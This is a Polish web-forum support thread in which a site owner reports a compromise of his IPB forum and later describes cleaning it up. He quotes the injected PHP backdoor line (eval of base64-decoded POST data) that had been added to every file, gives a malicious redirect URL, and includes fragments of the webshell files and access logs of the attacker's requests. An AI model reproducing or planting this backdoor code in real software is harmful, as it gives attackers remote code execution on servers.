Skocz do zawartości
"Idzie nowe..." - o zmianach i nie tylko ×
Przeniesienie zakupów z IPS Marketplace / Moving bought items from IPS Marketplace ×
Hosting webh.pl - 20%

Włamanie?

Zosski

Przez Zosski
w Ogólny support IPB

 Udostępnij

Rekomendowane odpowiedzi

Zosski Uczeń

Zosski

Opublikowano
Opublikowano (edytowane)

Witam dzisiaj ok. 14:53 moje forum padło, dopiero co wszedłem na PC.

Po wejściu na FTP w każdym z pliku było dopisane:

if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}




Jakiekolwiek pomysły co to może być?

Czy to był włam, czy jakaś ingerencja od mojej strony www, czy też hosting?

Był tam też plik z przekierowaniem na http://demoralization.ru:8080/forum/links/column.php'>http://demoralization.ru:8080/forum/links/column.php

@EDIT:
Znalazłem kolejne pliki wp-conf.php

<?php if(isset($_GET["t2947n"])){

oraz wp-sample.php


<?php if(isset($_GET["t3265n"])){  //cb6f82f3e4007bdaccf419abafab94c8 $_=//system file do not

Pomysły?

@Edit2: Logi apcache:

209.13 - - [09/Jan/2013:14:14:32 +0100] "GET /wp-conf.php?t2947n=1 HTTP/1.1" 200 22155 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:32 +0100] "POST /wp-conf.php?t2947n=1 HTTP/1.1" 200 22801 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:32 +0100] "POST /system_file.php HTTP/1.1" 200 211 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:33 +0100] "POST /wp-conf.php?t2947n=1 HTTP/1.1" 200 22971 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:33 +0100] "POST /wp-conf.php?t2947n=1 HTTP/1.1" 200 23563 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:33 +0100] "POST /system_file.php HTTP/1.1" 200 502 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:34 +0100] "POST /conf_global.php HTTP/1.1" 200 374 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:34 +0100] "POST /system_file.php HTTP/1.1" 200 236 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:34 +0100] "POST /index.php HTTP/1.1" 200 368 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:34 +0100] "POST /dav.php HTTP/1.1" 200 366 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:35 +0100] "POST /initdata.php HTTP/1.1" 200 371 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:35 +0100] "POST /wp-sample.php HTTP/1.1" 200 203 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:35 +0100] "POST /plCheck.php HTTP/1.1" 200 225 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:35 +0100] "POST /wp-conf.php HTTP/1.1" 200 370 "-" "-"195.88.209.13 - - [09/Jan/2013:14:14:36 +0100] "GET /redirectng.htm HTTP/1.1" 200 710 "-" "-"

Edytowane przez DawPi
Edycja całych zainfekowanych plików.
Zosski Uczeń

Zosski

Opublikowano
  • Autor
Opublikowano (edytowane)

Już się tym zająłem, pliku usunąłem, wszystko sprawdzałem już. Zablokowałem z tego ip całkowicie dostęp do strony. Wgrałem łatki dopiero teraz, miałem tyle na głowie, że praktycznie o nich zapomniałem :/ Dziękuje za pomoc bardzo. Szybko się z tym uporałem i mam nadzieje, że to się już nie powtórzy.

Edytowane przez Zosski
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
 Udostępnij
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę.